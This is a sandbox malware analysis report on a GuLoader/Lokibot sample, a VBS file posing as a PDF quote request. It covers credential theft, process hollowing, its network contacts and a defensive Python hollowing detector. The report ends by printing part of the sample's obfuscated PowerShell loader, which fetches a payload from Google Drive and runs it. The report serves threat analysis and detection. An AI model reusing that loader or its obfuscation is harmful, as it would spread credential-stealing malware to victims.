Malware Analysis Report

2024-11-30 23:46

Sample ID 240917-rc9llawgnc
Target Zahteva za proračun 09-17-2024·pdf.vbs
SHA256 ea326ab009621bee402f7e6a54423851ed9f357ff7c773b790f32be91098c2b9
Tags
guloader lokibot collection credential_access discovery downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ea326ab009621bee402f7e6a54423851ed9f357ff7c773b790f32be91098c2b9

Threat Level: Known bad

The file Zahteva za proračun 09-17-2024·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

Lokibot

Guloader,Cloudeye

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

outlook_win_path

outlook_office_path

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 14:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 14:04

Reported

2024-09-17 14:06

Platform

win7-20240903-en

Max time kernel

145s

Max time network

155s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zahteva za proračun 09-17-2024·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2568 set thread context of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 2176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 2176 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 2132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2596 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2568 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zahteva za proračun 09-17-2024·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rougemontite.Syn && echo t"

C:\Windows\system32\cmd.exe

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rougemontite.Syn && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp

Files

memory/2176-4-0x000007FEF592E000-0x000007FEF592F000-memory.dmp

memory/2176-5-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

memory/2176-6-0x000000001B370000-0x000000001B652000-memory.dmp

memory/2176-7-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

memory/2176-8-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

memory/2176-9-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

memory/2176-10-0x000007FEF592E000-0x000007FEF592F000-memory.dmp

memory/2176-11-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

memory/2176-12-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

memory/2176-14-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KJ3DA1RJEJSI1EW2HVID.temp

MD5 38280f531ceae6f46f50cffe06bdfc6d
SHA1 036d9b0fafc55306aef973b5cd589053c7e68266
SHA256 cefbf1d03ae295cc04f31fe9d12cd7ae8f6408edd73956fe6a9de89f7dbe27b8
SHA512 85be9bbf439641411af1167b552dd0f96c77bb0c99d5646c1889d457f9daed66a6bfca11ff41d2ade964cbe56eab60b36595cac4c57dd47ddec3e5e07ac8ad7e

C:\Users\Admin\AppData\Roaming\Rougemontite.Syn

MD5 7df7a44a36f0666d01596fdfb4e93c5c
SHA1 c465aa950ffbfefe481851e0715d3b144585667e
SHA256 2ad4cb2a56b1f5150c2806ccb0f2527c61f6d2946751cad910a33e60313862b5
SHA512 7756fae223ac9ba367ef85efc829c5b734076202530f9492ee723f6c1b31387d922b166d1596a77c80b2472a352691f0b109999b48d9ffea0a90f888c7077e26

memory/2568-19-0x0000000006300000-0x000000000A0B6000-memory.dmp

memory/2396-22-0x0000000000910000-0x00000000046C6000-memory.dmp

memory/2396-44-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2176-46-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

memory/2396-45-0x0000000000910000-0x00000000046C6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 14:04

Reported

2024-09-17 14:06

Platform

win10v2004-20240802-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zahteva za proračun 09-17-2024·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4188 set thread context of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 4968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 4968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4968 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4968 wrote to memory of 3904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4968 wrote to memory of 3904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3904 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3904 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3904 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4188 wrote to memory of 1744 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 1744 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 1744 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
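Read together, the "Suspicious use of SetThreadContext" and "Suspicious use of WriteProcessMemory" tables above describe the injection step: the 32-bit powershell.exe (PID 4188) writes into the freshly started, argument-less wabmig.exe (PID 2480) five times and then sets its thread context, which is the process-hollowing pattern that lets Lokibot run under a signed Windows Mail binary. The sandbox logs a parent's WriteProcessMemory into every child it creates (note the same rows for the cmd.exe children), so writes on their own are noise; the signal is writes plus SetThreadContext on the same child. The following Python is an added example, not the report's or the sandbox's own code, that correlates the two tables into one finding and reconstructs the spawn chain. The input rows are copied from the tables above; the row-parsing regex and the rule that a child's first writer is its creator are the example's own assumptions.

```python
import re
from collections import Counter

# Constructed sample input: the "wrote to memory of" and "set thread context of"
# rows copied from the behavioral2 signature tables of this report.
SIGNATURE_LINES = r"""
PID 4188 set thread context of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4048 wrote to memory of 4968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 4968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4968 wrote to memory of 3904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3904 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4188 wrote to memory of 1744 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4188 wrote to memory of 2480 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
"""

# Assumed row layout (this example's own parsing rule):
#   PID <src> <operation> <dst> N/A <src image> <dst image>
# Image paths may contain spaces ("Program Files (x86)\windows mail"), so the
# two paths are split on the first ".exe" followed by a space.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) (?P<dst>\d+) "
    r"N/A (?P<src_img>.+?\.exe) (?P<dst_img>.+?\.exe)$"
)


def parse_rows(text: str) -> list:
    """Parse the signature rows into dicts; rows that do not match are skipped."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["src"], d["dst"] = int(d["src"]), int(d["dst"])
            rows.append(d)
    return rows


def find_hollowing(text: str) -> list:
    """Flag (parent, child) pairs where the parent both wrote into the child's
    memory and set a thread context in it, and rebuild the spawn chain that
    led to the parent.  Assumption: a child's first writer is its creator."""
    rows = parse_rows(text)
    writes = Counter()        # (src, dst) -> number of WriteProcessMemory rows
    context_set = set()       # (src, dst) pairs with a SetThreadContext row
    parent_of = {}            # child pid -> creator pid
    images = {}               # pid -> image path

    for r in rows:
        key = (r["src"], r["dst"])
        images[r["src"]] = r["src_img"]
        images[r["dst"]] = r["dst_img"]
        if r["op"] == "wrote to memory of":
            writes[key] += 1
            parent_of.setdefault(r["dst"], r["src"])
        else:
            context_set.add(key)

    findings = []
    for src, dst in sorted(context_set):
        if writes[(src, dst)] == 0:
            continue   # context changed but nothing was written: no payload to run
        chain = [dst]
        while chain[-1] in parent_of:   # walk up creator links to the root
            chain.append(parent_of[chain[-1]])
        findings.append({
            "parent_pid": src, "parent_image": images[src],
            "child_pid": dst, "child_image": images[dst],
            "writes": writes[(src, dst)],
            "chain": list(reversed(chain)),
        })
    return findings


if __name__ == "__main__":
    for f in find_hollowing(SIGNATURE_LINES):
        print(f"{f['parent_image']} ({f['parent_pid']}) hollowed "
              f"{f['child_image']} ({f['child_pid']}) after {f['writes']} writes")
        print("spawn chain:", " -> ".join(str(p) for p in f["chain"]))
```

On this report's rows the only pair that satisfies both conditions is 4188 -> 2480, with the chain 4048 (WScript.exe) -> 4968 (powershell.exe) -> 3904 (cmd.exe) -> 4188 (SysWOW64 powershell.exe) -> 2480 (wabmig.exe); the cmd.exe children receive writes but never a SetThreadContext, so they are not reported.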

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zahteva za proračun 09-17-2024·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. 
Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. 
